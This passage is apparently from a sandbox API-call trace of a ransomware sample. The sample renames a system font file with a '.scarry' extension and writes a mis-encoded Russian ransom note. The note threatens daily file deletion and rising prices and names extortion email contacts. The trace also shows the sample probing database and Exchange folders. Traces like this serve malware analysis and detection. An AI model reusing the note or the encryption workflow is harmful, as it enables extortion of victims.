(lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0108.731] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x0 [0108.732] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x1de8 [0108.732] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x0 [0108.732] ReadFile (in: hFile=0x1a4, lpBuffer=0x1e79f08, nNumberOfBytesToRead=0x1de8, 
lpNumberOfBytesRead=0x18ea34, lpOverlapped=0x0 | out: lpBuffer=0x1e79f08*, lpNumberOfBytesRead=0x18ea34*=0x1de8, lpOverlapped=0x0) returned 1 [0108.734] GlobalLock (hMem=0x450004) returned 0x591988 [0108.734] GlobalLock (hMem=0x45000c) returned 0x593998 [0108.734] GlobalHandle (pMem=0x591988) returned 0x450004 [0108.734] GlobalUnlock (hMem=0x450004) returned 0 [0108.734] GlobalHandle (pMem=0x593998) returned 0x45000c [0108.734] GlobalUnlock (hMem=0x45000c) returned 0 [0108.734] GlobalLock (hMem=0x45000c) returned 0x591988 [0108.734] GlobalHandle (pMem=0x591988) returned 0x45000c [0108.734] GlobalUnlock (hMem=0x45000c) returned 0 [0108.990] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e7be18, cbMultiByte=37, lpWideCharStr=0x18da40, cchWideChar=2047 | out: lpWideCharStr="AzQX0q5p4V3C2CA2Q4gBgngW2woDnQ.scarryry=GSpuRTe9BYpCgPmO.scarry") returned 37 [0108.990] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\AzQX0q5p4V3C2CA2Q4gBgngW2woDnQ.scarry" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\azqx0q5p4v3c2ca2q4gbgngw2wodnq.scarry")) returned 1 [0108.991] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\AzQX0q5p4V3C2CA2Q4gBgngW2woDnQ.scarry" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\azqx0q5p4v3c2ca2q4gbgngw2wodnq.scarry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0108.991] SetFileTime (hFile=0x1a4, lpCreationTime=0x18ead0, lpLastAccessTime=0x18eac8, lpLastWriteTime=0x18eac0) returned 1 [0108.991] CloseHandle (hObject=0x1a4) returned 1 [0108.992] SetFileAttributesW (lpFileName="C:\\Program Files\\Common 
Files\\Microsoft Shared\\EQUATION\\AzQX0q5p4V3C2CA2Q4gBgngW2woDnQ.scarry", dwFileAttributes=0x20) returned 1 [0108.992] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ab98, cbMultiByte=36, lpWideCharStr=0x18dd68, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT\x18\x03") returned 36 [0108.992] GlobalLock (hMem=0x45000c) returned 0x591988 [0108.992] GlobalHandle (pMem=0x591988) returned 0x45000c [0108.992] GlobalUnlock (hMem=0x45000c) returned 0 [0108.992] GlobalLock (hMem=0x45000c) returned 0x591988 [0108.992] GlobalLock (hMem=0x450004) returned 0x593998 [0108.992] GlobalHandle (pMem=0x591988) returned 0x45000c [0108.992] GlobalUnlock (hMem=0x45000c) returned 0 [0108.992] GlobalHandle (pMem=0x593998) returned 0x450004 [0108.992] GlobalUnlock (hMem=0x450004) returned 0 [0108.992] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}\r\n\r\nÂàøè äîêóìåíòû, ôîòîãðàôèè, áàçû äàííûõ è äðóãèå âàæíûå ôàéëû áûëè çàøèôðîâàíû. \r\nÊàæäûå 24 ÷àñà óäàëÿþòñÿ 24 ôàéëà, íåîáõîäèìî ïðèñëàòü ñâîé èäåíòèôèêàòîð ÷òîá ìû îòêëþ÷èëè ýòó ôóíêöèþ.\r\nÊàæäûå 24 ÷àñà ñòîèìîñòü ðàñøèôðîâêè äàííûõ óâåëè÷èâàåòñÿ íà 30% (÷åðåç 72 ÷àñà ñóììà ôèêñèðóåòñÿ)\r\n\r\nÄëÿ ðàñøèôðîâêè äàííûõ:\r\n\r\nÍàïèøèòå íà ïî÷òó - scarry38@horsefucker.org\r\n \r\n * ïèñüìå óêàçàòü Âàø ëè÷íûé èäåíòèôèêàòîð\r\n *Ïðèêðåïèòå 2 ôàéëà äî 1 ìá äëÿ òåñòîâîé ðàñøèôðîâêè. \r\n ìû èõ ðàñøèôðóåì, â êà÷åñòâå äîêàçàòåëüñòâà, ÷òî ÒÎËÜÊÎ ÌÛ ìîæåì ðàñøèôðîâàòü ôàéëû.\r\n\r\nÂÀÆÍÎ! Íå ïèøèòå ñ mail.ru (ê íàì íå äîõîäÿò ïèüñìà) Èñïîëüçóéòå - yandex.ru gmail.com è ò.ä. 
\r\nÂñå êðîìå mail.ru\r\n\r\n -×åì áûñòðåå âû ñîîáùèòå íàì ñâîé èäåíòèôèêàòîð, òåì áûñòðåå ìû âûêëþ÷èì ïðîèçâîëüíîå óäàëåíèå ôàéëîâ.\r\n -Íàïèñàâ íàì íà ïî÷òó âû ïîëó÷èòå äàëüíåéøèå èíñòðóêöèè ïî îïëàòå.\r\n\r\n îòâåòíîì ïèñüìå Âû ïîëó÷èòå ïðîãðàììó äëÿ ðàñøèôðîâêè.\r\nÏîñëå çàïóñêà ïðîãðàììû-äåøèôðîâùèêà âñå Âàøè ôàéëû áóäóò âîññòàíîâëåíû.\r\n\r\nÌû ãàðàíòèðóåì:\r\n100% óñïåøíîå âîññòàíîâëåíèå âñåõ âàøèõ ôàéëîâ\r\n100% ãàðàíòèþ ñîîòâåòñòâèÿ\r\n100% áåçîïàñíûé è íàäåæíûé ñåðâèñ\r\n\r\nÂíèìàíèå!\r\n * Íå ïûòàéòåñü óäàëèòü ïðîãðàììó èëè çàïóñêàòü àíòèâèðóñíûå ñðåäñòâà\r\n * Ïîïûòêè ñàìîñòîÿòåëüíîé ðàñøèôðîâêè ôàéëîâ ïðèâåäóò ê ïîòåðå Âàøèõ äàííûõ\r\n * Äåøèôðàòîðû äðóãèõ ïîëüçîâàòåëåé íåñîâìåñòèìû ñ Âàøèìè äàííûìè, òàê êàê ó êàæäîãî ïîëüçîâàòåëÿ\r\nóíèêàëüíûé êëþ÷ øèôðîâàíèÿ\r\n\r\n Åñëè âàì íå îòâåòèëè â òå÷åíèè 24õ ÷àñîâ, ïèøèòå íà ðåçåðâíóþ ïî÷òó - black8201@protonmail.com\r\n====================================================================================================\r\n\r\nÂàø ëè÷íûé èäåíòèôèêàòîð\r\n\r\n{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0108.993] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0108.993] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT", lpFindFileData=0x18eb1c | out: lpFindFileData=0x18eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd8d32a0, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xfd8d32a0, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0xfd8d32a0, ftLastWriteTime.dwHighDateTime=0x1d61645, nFileSizeHigh=0x0, nFileSizeLow=0xdf9, dwReserved0=0xe80020c8, dwReserved1=0x402, cFileName="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT", cAlternateFileName="D407~1.TXT")) returned 0x58b060 [0108.993] FileTimeToLocalFileTime (in: lpFileTime=0x18eb30, 
lpLocalFileTime=0x18eab0 | out: lpLocalFileTime=0x18eab0) returned 1 [0108.993] FileTimeToDosDateTime (in: lpFileTime=0x18eab0, lpFatDate=0x18eafe, lpFatTime=0x18eafc | out: lpFatDate=0x18eafe, lpFatTime=0x18eafc) returned 1 [0108.993] FindClose (in: hFindFile=0x58b060 | out: hFindFile=0x58b060) returned 1 [0108.993] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0108.993] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0108.993] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0xdf9 [0108.993] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0108.993] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0108.993] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0xdf9 [0108.993] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0108.993] ReadFile (in: hFile=0x1a4, lpBuffer=0x1e7ad38, nNumberOfBytesToRead=0xdf9, lpNumberOfBytesRead=0x18ed28, lpOverlapped=0x0 | out: lpBuffer=0x1e7ad38*, lpNumberOfBytesRead=0x18ed28*=0xdf9, lpOverlapped=0x0) returned 1 [0108.993] CloseHandle (hObject=0x1a4) 
returned 1 [0108.994] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95fd7600, ftCreationTime.dwHighDateTime=0x1bc9dc7, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x95fd7600, ftLastWriteTime.dwHighDateTime=0x1bc9dc7, nFileSizeHigh=0x0, nFileSizeLow=0x1de8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MTEXTRA.TTF", cAlternateFileName="")) returned 0 [0108.994] GetLastError () returned 0x12 [0108.994] FindClose (in: hFindFile=0x58b020 | out: hFindFile=0x58b020) returned 1 [0108.994] GlobalLock (hMem=0x450004) returned 0x591988 [0108.994] GlobalHandle (pMem=0x591988) returned 0x450004 [0108.994] GlobalUnlock (hMem=0x450004) returned 0 [0108.994] GlobalLock (hMem=0x450004) returned 0x591988 [0108.994] GlobalLock (hMem=0x45000c) returned 0x593998 [0108.994] GlobalHandle (pMem=0x591988) returned 0x450004 [0108.994] GlobalUnlock (hMem=0x450004) returned 0 [0108.994] GlobalHandle (pMem=0x593998) returned 0x45000c [0108.994] GlobalUnlock (hMem=0x45000c) returned 0 [0108.994] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*", lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe19a3c0, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0xfe19a3c0, ftLastWriteTime.dwHighDateTime=0x1d61645, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x58b020 [0108.995] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc8 | out: lpLocalFileTime=0x18edc8) returned 1 [0108.995] FileTimeToDosDateTime (in: lpFileTime=0x18edc8, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 
[0108.995] GlobalLock (hMem=0x45000c) returned 0x591988 [0108.995] GlobalHandle (pMem=0x591988) returned 0x45000c [0108.995] GlobalUnlock (hMem=0x45000c) returned 0 [0108.995] GlobalLock (hMem=0x45000c) returned 0x591988 [0108.995] GlobalLock (hMem=0x450004) returned 0x593998 [0108.995] GlobalHandle (pMem=0x591988) returned 0x45000c [0108.995] GlobalUnlock (hMem=0x45000c) returned 0 [0108.995] GlobalHandle (pMem=0x593998) returned 0x450004 [0108.995] GlobalUnlock (hMem=0x450004) returned 0 [0108.995] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0108.995] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe19a3c0, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0xfe19a3c0, ftLastWriteTime.dwHighDateTime=0x1d61645, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0108.995] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0108.995] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0108.995] GlobalLock (hMem=0x450004) returned 0x591988 [0108.995] GlobalHandle (pMem=0x591988) returned 0x450004 [0108.995] GlobalUnlock (hMem=0x450004) returned 0 [0108.995] GlobalLock (hMem=0x450004) returned 0x591988 [0108.995] GlobalLock (hMem=0x45000c) returned 0x593998 [0108.995] GlobalHandle (pMem=0x591988) returned 0x450004 [0108.995] GlobalUnlock (hMem=0x450004) returned 0 [0108.996] GlobalHandle (pMem=0x593998) returned 0x45000c [0108.996] GlobalUnlock (hMem=0x45000c) returned 0 [0108.996] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, 
lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0108.996] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0108.996] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0108.996] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0108.996] GlobalLock (hMem=0x45000c) returned 0x591988 [0108.996] GlobalHandle (pMem=0x591988) returned 0x45000c [0108.996] GlobalUnlock (hMem=0x45000c) returned 0 [0108.996] GlobalLock (hMem=0x45000c) returned 0x591988 [0108.996] GlobalLock (hMem=0x450004) returned 0x593998 [0108.996] GlobalHandle (pMem=0x591988) returned 0x45000c [0108.996] GlobalUnlock (hMem=0x45000c) returned 0 [0108.996] GlobalHandle (pMem=0x593998) returned 0x450004 [0108.996] GlobalUnlock (hMem=0x450004) returned 0 [0108.996] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0108.996] GlobalLock (hMem=0x450004) returned 0x591988 [0108.996] GlobalHandle (pMem=0x591988) returned 0x450004 [0108.996] GlobalUnlock (hMem=0x450004) returned 0 [0108.996] GlobalLock (hMem=0x450004) returned 0x591988 [0108.996] GlobalLock (hMem=0x45000c) returned 0x593998 [0108.996] GlobalHandle (pMem=0x591988) returned 0x450004 [0108.997] GlobalUnlock (hMem=0x450004) returned 0 [0108.997] GlobalHandle (pMem=0x593998) returned 0x45000c [0108.997] GlobalUnlock (hMem=0x45000c) returned 0 [0108.997] OpenMutexA 
(dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0108.997] SysReAllocStringLen (in: pbstr=0x18edc4*=0x0, psz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033", len=0x3c | out: pbstr=0x18edc4*="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033") returned 1 [0108.997] GlobalLock (hMem=0x45000c) returned 0x591988 [0108.997] GlobalHandle (pMem=0x591988) returned 0x45000c [0108.997] GlobalUnlock (hMem=0x45000c) returned 0 [0108.997] GlobalLock (hMem=0x45000c) returned 0x591988 [0108.997] GlobalLock (hMem=0x450004) returned 0x593998 [0108.997] GlobalHandle (pMem=0x591988) returned 0x45000c [0108.997] GlobalUnlock (hMem=0x45000c) returned 0 [0108.997] GlobalHandle (pMem=0x593998) returned 0x450004 [0108.997] GlobalUnlock (hMem=0x450004) returned 0 [0108.997] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\Microsoft\\Exchange Server", lpFindFileData=0x18e840 | out: lpFindFileData=0x18e840*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="䱈@팒X틦X企@\x18㽜V\x18\x1b")) returned 0xffffffff [0109.071] GetLastError () returned 0x3 [0109.071] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.071] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d2c0, cbMultiByte=26, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr="microsoft\\exchange server\\\x1b") returned 26 [0109.071] MultiByteToWideChar 
(in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=21, lpWideCharStr=0x18da8c, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server\\rver\\") returned 21 [0109.071] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\Microsoft SQL Server", lpFindFileData=0x18e840 | out: lpFindFileData=0x18e840*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="V䱠@퉬X企@\x18괜V\x181")) returned 0xffffffff [0109.072] GetLastError () returned 0x2 [0109.072] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.072] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d2c0, cbMultiByte=21, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server\\\x18\x15") returned 21 [0109.072] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=9, lpWideCharStr=0x18da8c, cchWideChar=2047 | out: lpWideCharStr="Firebird\\ SQL Server\\rver\\") returned 9 [0109.072] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\Firebird", lpFindFileData=0x18e840 | out: lpFindFileData=0x18e840*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, 
dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="V䱠@퐼X企@\x18㪔X\x18;")) returned 0xffffffff [0109.073] GetLastError () returned 0x2 [0109.073] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.073] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9a68, cbMultiByte=9, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr="firebird\\") returned 9 [0109.073] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=8, lpWideCharStr=0x18da8c, cchWideChar=2047 | out: lpWideCharStr="MSSQL.1\\\\ SQL Server\\rver\\") returned 8 [0109.073] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\MSSQL.1", lpFindFileData=0x18e840 | out: lpFindFileData=0x18e840*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="V䱠@麌W企@\x18㩄X\x18D")) returned 0xffffffff [0109.073] GetLastError () returned 0x2 [0109.074] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.074] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9a68, cbMultiByte=8, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr="mssql.1\\ ") returned 8 [0109.074] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=37, lpWideCharStr=0x18da8c, 
cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server Compact Edition\\") returned 37 [0109.074] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\Microsoft SQL Server Compact Edition", lpFindFileData=0x18e840 | out: lpFindFileData=0x18e840*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="V䱠@퉬X企@\x18퐼X\x18j")) returned 0xffffffff [0109.074] GetLastError () returned 0x2 [0109.074] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.074] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ace8, cbMultiByte=37, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server compact edition\\icrosoft SQL Server Compact Edition\\") returned 37 [0109.075] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18da8c, cchWideChar=2047 | out: lpWideCharStr="Adobe\\oft SQL Server Compact Edition\\") returned 6 [0109.075] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\Adobe", lpFindFileData=0x18e840 | out: lpFindFileData=0x18e840*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, 
dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="V䱠@麌W企@\x18㪔X\x18q")) returned 0xffffffff [0109.075] GetLastError () returned 0x2 [0109.075] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.075] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9a68, cbMultiByte=6, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr="adobe\\퐸XP") returned 6 [0109.075] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18da8c, cchWideChar=2047 | out: lpWideCharStr="Oracle\\ft SQL Server Compact Edition\\") returned 7 [0109.075] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\Oracle", lpFindFileData=0x18e840 | out: lpFindFileData=0x18e840*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="V䱠@鰄W企@\x18㩄X\x18y")) returned 0xffffffff [0109.076] GetLastError () returned 0x2 [0109.076] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.076] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9a68, cbMultiByte=7, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr="oracle\\X 